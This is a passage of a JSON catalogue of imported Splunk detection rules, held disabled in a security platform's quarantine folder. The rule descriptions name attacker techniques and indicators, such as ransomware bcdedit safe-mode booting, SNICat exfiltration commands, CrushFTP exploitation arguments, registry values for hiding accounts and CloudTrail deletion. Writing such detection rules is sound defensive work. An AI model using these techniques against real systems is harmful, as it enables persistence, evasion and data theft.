access key is different from the user for whom the key is created. This activity is significant because unauthorized access key creation can allow attackers to establish persistence or exfiltrate data via AWS APIs. 
If confirmed malicious, this could lead to unauthorized access to AWS services, data exfiltration, and long-term persistence in the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-create-access-key.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "81a9f2fe-1697-473c-af1d-086b0d8b63c8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_create_access_key.yml" } }, { "id": "splunk-security-content-81f1dce0-0f18-11ec-a5d7-acde48001122", "type": "detection", "name": "Change To Safe Mode With Network Config", "description": "The following analytic detects the execution of a suspicious `bcdedit` command that configures a host to boot in safe mode with network support. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions involving `bcdedit.exe` with specific parameters. This activity is significant because it is a known technique used by BlackMatter ransomware to force a compromised host into safe mode for continued encryption. 
If confirmed malicious, this could allow attackers to bypass certain security controls, persist in the environment, and continue their malicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/change-to-safe-mode-with-network-config.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "81f1dce0-0f18-11ec-a5d7-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/change_to_safe_mode_with_network_config.yml" } }, { "id": "splunk-security-content-82092925-9ca1-4e06-98b8-85a2d3889552", "type": "detection", "name": "AWS Defense Evasion Delete Cloudtrail", "description": "The following analytic detects the deletion of AWS CloudTrail logs by identifying `DeleteTrail` events within CloudTrail logs. This detection leverages CloudTrail data to monitor for successful `DeleteTrail` actions, excluding those initiated from the AWS console. This activity is significant because adversaries may delete CloudTrail logs to evade detection and operate stealthily within the compromised environment. 
If confirmed malicious, this action could allow attackers to cover their tracks, making it difficult to trace their activities and potentially leading to prolonged unauthorized access and further exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-defense-evasion-delete-cloudtrail.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "82092925-9ca1-4e06-98b8-85a2d3889552", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_defense_evasion_delete_cloudtrail.yml" } }, { "id": "splunk-security-content-8230c407-1b47-4d95-ac2e-718bd6381386", "type": "detection", "name": "Linux Auditd Setuid Using Chmod Utility", "description": "The following analytic detects the execution of the chmod utility to set the SUID or SGID bit on files, which can allow users to temporarily gain root or group-level access. This detection leverages data from Linux Auditd, focusing on process names and command-line arguments related to chmod. This activity is significant as it can indicate an attempt to escalate privileges or maintain persistence on a system. 
If confirmed malicious, an attacker could gain elevated access, potentially compromising sensitive data or critical system functions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-setuid-using-chmod-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8230c407-1b47-4d95-ac2e-718bd6381386", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_setuid_using_chmod_utility.yml" } }, { "id": "splunk-security-content-823136f2-d755-4b6d-ae04-372b486a5808", "type": "detection", "name": "First Time Seen Running Windows Service", "description": "The following analytic detects the first occurrence of a Windows service running in your environment. It leverages Windows system event logs, specifically EventCode 7036, to identify services entering the \"running\" state. This activity is significant because the appearance of a new or previously unseen service could indicate the installation of unauthorized or malicious software. If confirmed malicious, this activity could allow an attacker to execute arbitrary code, maintain persistence, or escalate privileges within the environment. 
Monitoring for new services helps in early detection of potential threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/first-time-seen-running-windows-service.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "823136f2-d755-4b6d-ae04-372b486a5808", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/first_time_seen_running_windows_service.yml" } }, { "id": "splunk-security-content-824dd598-71be-4203-bc3b-024f4cda340e", "type": "detection", "name": "Windows Modify Registry Regedit Silent Reg Import", "description": "The following analytic detects the modification of the Windows registry using the regedit.exe application with the silent mode parameter. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant because the silent mode allows registry changes without user confirmation, which can be exploited by adversaries to import malicious registry settings. 
If confirmed malicious, this could enable attackers to persist in the environment, escalate privileges, or manipulate system configurations, leading to potential system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-regedit-silent-reg-import.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "824dd598-71be-4203-bc3b-024f4cda340e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_regedit_silent_reg_import.yml" } }, { "id": "splunk-security-content-825fed20-309d-4fd1-8aaf-cd49c1bb093c", "type": "detection", "name": "Azure AD Global Administrator Role Assigned", "description": "The following analytic detects the assignment of the Azure AD Global Administrator role to a user. It leverages Azure Active Directory AuditLogs to identify when the \"Add member to role\" operation includes the \"Global Administrator\" role. This activity is significant because the Global Administrator role grants extensive access to data, resources, and settings, similar to a Domain Administrator in traditional AD environments. 
If confirmed malicious, this could allow an attacker to establish persistence, escalate privileges, and potentially gain control over Azure resources, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-global-administrator-role-assigned.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "825fed20-309d-4fd1-8aaf-cd49c1bb093c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_global_administrator_role_assigned.yml" } }, { "id": "splunk-security-content-826dbaae-a1e6-4c8c-b384-d16898956e73", "type": "detection", "name": "Okta Multiple Failed MFA Requests For User", "description": "The following analytic identifies multiple failed multi-factor authentication (MFA) requests for a single user within an Okta tenant. It triggers when more than 10 MFA attempts fail within 5 minutes, using Okta event logs to detect this pattern. This activity is significant as it may indicate an adversary attempting to bypass MFA by bombarding the user with repeated authentication requests, a technique used by threat actors like Lapsus and APT29. 
If confirmed malicious, this could lead to unauthorized access, potentially compromising sensitive information and systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1621" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/okta-multiple-failed-mfa-requests-for-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "826dbaae-a1e6-4c8c-b384-d16898956e73", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/okta_multiple_failed_mfa_requests_for_user.yml" } }, { "id": "splunk-security-content-8281ce42-5c50-11ec-82d2-acde48001122", "type": "detection", "name": "Java Class File download by Java User Agent", "description": "The following analytic identifies a Java user agent performing a GET request for a .class file from a remote site. It leverages web or proxy logs within the Web Datamodel to detect this activity. This behavior is significant as it may indicate exploitation attempts, such as those related to CVE-2021-44228 (Log4Shell). 
If confirmed malicious, an attacker could exploit vulnerabilities in the Java application, potentially leading to remote code execution and further compromise of the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/java-class-file-download-by-java-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8281ce42-5c50-11ec-82d2-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/java_class_file_download_by_java_user_agent.yml" } }, { "id": "splunk-security-content-82d06410-134c-11eb-adc1-0242ac120002", "type": "detection", "name": "Detect SNICat SNI Exfiltration", "description": "The following analytic identifies the use of SNICat tool commands within the TLS SNI field, indicating potential data exfiltration attempts. It leverages Zeek SSL data to detect specific SNICat commands such as LIST, LS, SIZE, LD, CB, EX, ALIVE, EXIT, WHERE, and finito in the server_name field. This activity is significant as SNICat is a known tool for covert data exfiltration using TLS. 
If confirmed malicious, this could allow attackers to exfiltrate sensitive data undetected, posing a severe threat to data confidentiality and integrity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1041" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-snicat-sni-exfiltration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "82d06410-134c-11eb-adc1-0242ac120002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/detect_snicat_sni_exfiltration.yml" } }, { "id": "splunk-security-content-82eb7f64-d219-4e21-acfe-956de84c1a35", "type": "detection", "name": "CrushFTP Authentication Bypass Exploitation", "description": "The following analytic detects potential exploitation of the CrushFTP authentication bypass vulnerability (CVE-2025-31161). This detection identifies suspicious command execution patterns associated with exploitation of this vulnerability, such as executing mesch.exe with specific arguments like b64exec or fullinstall. 
This activity is indicative of an attacker exploiting CVE-2025-31161 to gain unauthorized access to the CrushFTP server and perform post-exploitation activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1059.003", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/crushftp-authentication-bypass-exploitation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "82eb7f64-d219-4e21-acfe-956de84c1a35", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/crushftp_authentication_bypass_exploitation.yml" } }, { "id": "splunk-security-content-8309c3a8-4d34-48ae-ad66-631658214653", "type": "detection", "name": "Windows Kerberos Local Successful Logon", "description": "The following analytic identifies a local successful authentication event on a Windows endpoint using the Kerberos package. It detects EventCode 4624 with LogonType 3 and source address 127.0.0.1, indicating a login to the built-in local Administrator account. This activity is significant as it may suggest a Kerberos relay attack, a method attackers use to escalate privileges. 
If confirmed malicious, this could allow an attacker to gain unauthorized access to sensitive systems, execute arbitrary code, or create new accounts in Active Directory, leading to potential system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-kerberos-local-successful-logon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8309c3a8-4d34-48ae-ad66-631658214653", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_kerberos_local_successful_logon.yml" } }, { "id": "splunk-security-content-83317b08-155b-11ec-8e00-acde48001122", "type": "detection", "name": "Wmic Group Discovery", "description": "The following analytic identifies the use of `wmic.exe` to enumerate local groups on an endpoint. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs, including command-line details. Monitoring this activity is significant as it can indicate reconnaissance efforts by an attacker to understand group memberships, which could be a precursor to privilege escalation or lateral movement. 
If confirmed malicious, this activity could allow an attacker to map out privileged groups, aiding in further exploitation and persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/wmic-group-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "83317b08-155b-11ec-8e00-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/wmic_group_discovery.yml" } }, { "id": "splunk-security-content-83458004-db60-4170-857d-8572f16f070b", "type": "detection", "name": "Windows Admon Default Group Policy Object Modified", "description": "The following analytic detects modifications to the default Group Policy Objects (GPOs) in an Active Directory environment. It leverages Splunk's Admon to monitor updates to the \"Default Domain Policy\" and \"Default Domain Controllers Policy.\" This activity is significant because changes to these default GPOs can indicate an adversary with privileged access attempting to gain further control, establish persistence, or deploy malware across multiple hosts. 
If confirmed malicious, such modifications could lead to widespread policy enforcement changes, unauthorized access, and potential compromise of the entire domain environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1484.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-admon-default-group-policy-object-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "83458004-db60-4170-857d-8572f16f070b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_admon_default_group_policy_object_modified.yml" } }, { "id": "splunk-security-content-834ba832-ad89-11eb-937d-acde48001122", "type": "detection", "name": "Hide User Account From Sign-In Screen", "description": "The following analytic detects a suspicious registry modification that hides a user account from the Windows Login screen. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the registry path \"*\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\Userlist*\" with a value of \"0x00000000\". This activity is significant as it may indicate an adversary attempting to create a hidden admin account to avoid detection and maintain persistence on the compromised machine. 
If confirmed malicious, this could allow the attacker to maintain undetected access and control over the system, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/hide-user-account-from-sign-in-screen.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "834ba832-ad89-11eb-937d-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/hide_user_account_from_sign_in_screen.yml" } }, { "id": "splunk-security-content-8351340b-ac0e-41ec-8b07-dd01bf32d6ea", "type": "detection", "name": "Windows Hijack Execution Flow Version Dll Side Load", "description": "The following analytic detects a process loading a version.dll file from a directory other than %windir%\\system32 or %windir%\\syswow64. This detection leverages Sysmon EventCode 7 to identify instances where an unsigned or improperly located version.dll is loaded. This activity is significant as it is a common technique used in ransomware and APT malware campaigns, including Brute Ratel C4, to execute malicious code via DLL side loading. 
If confirmed malicious, this could allow attackers to execute arbitrary code, maintain persistence, and potentially compromise the target host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-hijack-execution-flow-version-dll-side-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8351340b-ac0e-41ec-8b07-dd01bf32d6ea", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_hijack_execution_flow_version_dll_side_load.yml" } }, { "id": "splunk-security-content-8367cb99-bae1-4748-ae3b-0927bb381424", "type": "detection", "name": "GitHub Enterprise Repository Archived", "description": "The following analytic detects when a repository is archived in GitHub Enterprise. The detection monitors GitHub Enterprise audit logs for repository archival events by tracking actor details, repository information, and associated metadata. For a SOC, identifying repository archival is important as it could indicate attempts to make critical code inaccessible or preparation for repository deletion. While archiving is a legitimate feature, unauthorized archival of active repositories could signal account compromise, insider threats, or attempts to disrupt development operations. The impact of unauthorized repository archival includes loss of active development access, disruption to workflows and CI/CD pipelines, and potential business delays if critical repositories are affected. 
Additionally, archived repositories may be targeted for subsequent deletion, potentially resulting in permanent loss of intellectual property if proper backups are not maintained.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485", "T1195" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/github-enterprise-repository-archived.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8367cb99-bae1-4748-ae3b-0927bb381424", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/github_enterprise_repository_archived.yml" } }, { "id": "splunk-security-content-83776de4-921a-11eb-868a-acde48001122", "type": "detection", "name": "Disabling FolderOptions Windows Feature", "description": "The following analytic detects the modification of the Windows registry to disable the Folder Options feature, which prevents users from showing hidden files and file extensions. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the registry path \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoFolderOptions\" with a value of \"0x00000001\". This activity is significant as it is commonly used by malware to conceal malicious files and deceive users with fake file extensions. 
If confirmed malicious, this could allow an attacker to hide their presence and malicious files, making detection and remediation more difficult.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disabling-folderoptions-windows-feature.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "83776de4-921a-11eb-868a-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disabling_folderoptions_windows_feature.yml" } }, { "id": "splunk-security-content-839ab790-a60a-4f81-bfb3-02567063f615", "type": "detection", "name": "Linux Deletion of SSL Certificate", "description": "The following analytic detects the deletion of SSL certificates on a Linux machine. It leverages filesystem event logs to identify when files with extensions .pem or .crt are deleted from the /etc/ssl/certs/ directory. This activity is significant because attackers may delete or modify SSL certificates to disable security features or evade defenses on a compromised system. 
If confirmed malicious, this behavior could indicate an attempt to disrupt secure communications, evade detection, or execute a destructive payload, potentially leading to significant security breaches and data loss.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004", "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-deletion-of-ssl-certificate.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "839ab790-a60a-4f81-bfb3-02567063f615", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_deletion_of_ssl_certificate.yml" } }, { "id": "splunk-security-content-841e2abc-0442-4e7f-b445-b22680632a08", "type": "detection", "name": "Windows Browser Process Launched with Unusual Flags", "description": "The following analytic detects the use of unusual browser flags, specifically --mute-audio and --do-not-elevate, which deviate from standard browser launch behavior. These flags may indicate automated scripts, testing environments, or attempts to modify browser functionality for silent operation or restricted privilege execution. Detection focuses on non-standard launch parameters, unexpected process behavior, or deviations from baseline configurations. 
Monitoring such flag usage helps identify potentially suspicious activity, misconfigurations, or policy violations, enabling security teams to investigate anomalies, ensure system compliance, and differentiate legitimate administrative or testing uses from unusual or unauthorized operations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1185" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-browser-process-launched-with-unusual-flags.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "841e2abc-0442-4e7f-b445-b22680632a08", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_browser_process_launched_with_unusual_flags.yml" } }, { "id": "splunk-security-content-8467d8cd-b0f9-46fa-ac84-a30ad138983e", "type": "detection", "name": "Windows Impair Defense Disable Defender Firewall And Network", "description": "The following analytic detects modifications in the Windows registry to disable firewall and network protection settings within Windows Defender Security Center. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the UILockdown registry value. This activity is significant as it may indicate an attempt to impair system defenses, potentially restricting users from modifying firewall or network protection settings. 
If confirmed malicious, this could allow an attacker to weaken the system's security posture, making it more vulnerable to further attacks and unauthorized access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-disable-defender-firewall-and-network.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8467d8cd-b0f9-46fa-ac84-a30ad138983e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_disable_defender_firewall_and_network.yml" } }, { "id": "splunk-security-content-8470d755-0c13-45b3-bd63-387a373c10cf", "type": "detection", "name": "Reg exe Manipulating Windows Services Registry Keys", "description": "The following analytic detects the use of reg.exe to modify registry keys associated with Windows services and their configurations. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, parent processes, and command-line executions. This activity is significant because unauthorized changes to service registry keys can indicate an attempt to establish persistence or escalate privileges. 
If confirmed malicious, this could allow an attacker to control service behavior, potentially leading to unauthorized code execution or system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/reg-exe-manipulating-windows-services-registry-keys.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8470d755-0c13-45b3-bd63-387a373c10cf", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/reg_exe_manipulating_windows_services_registry_keys.yml" } }, { "id": "splunk-security-content-85096389-a443-42df-b89d-200efbb1b560", "type": "detection", "name": "AWS S3 Exfiltration Behavior Identified", "description": "The following analytic identifies potential AWS S3 exfiltration behavior by correlating multiple risk events related to Collection and Exfiltration techniques. It leverages risk events from AWS sources, focusing on instances where two or more unique analytics and distinct MITRE ATT&CK IDs are triggered for a specific risk object. This activity is significant as it may indicate an ongoing data exfiltration attempt, which is critical for security teams to monitor. 
If confirmed malicious, this could lead to unauthorized access and theft of sensitive information, compromising the organization's data integrity and confidentiality.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1537" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-s3-exfiltration-behavior-identified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "85096389-a443-42df-b89d-200efbb1b560", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_s3_exfiltration_behavior_identified.yml" } }, { "id": "splunk-security-content-8551252d-b5b6-4b6e-8a82-51460aeb29a3", "type": "detection", "name": "DNS Kerberos Coercion", "description": "Detects DNS-based Kerberos coercion attacks where adversaries inject marshaled credential structures into DNS records to spoof SPNs and redirect authentication such as in CVE-2025-33073. 
This detection leverages Suricata, looking for specific CREDENTIAL_TARGET_INFORMATION structures in DNS queries.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1557.001", "T1187", "T1071.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/dns-kerberos-coercion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8551252d-b5b6-4b6e-8a82-51460aeb29a3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/dns_kerberos_coercion.yml" } }, { "id": "splunk-security-content-8560de46-ea2d-4c69-8ca3-5b78b90f1338", "type": "detection", "name": "Windows AppX Deployment Full Trust Package Installation", "description": "The following analytic detects the installation of MSIX/AppX packages with full trust privileges. This detection leverages Windows event logs from the AppXDeployment-Server, specifically focusing on EventCode 400 which indicates a package deployment operation. Full trust packages are significant as they run with elevated privileges outside the normal AppX container restrictions, allowing them to access system resources that regular AppX packages cannot. Adversaries have been observed leveraging full trust MSIX packages to deliver malware, as documented in recent threat intelligence reports. 
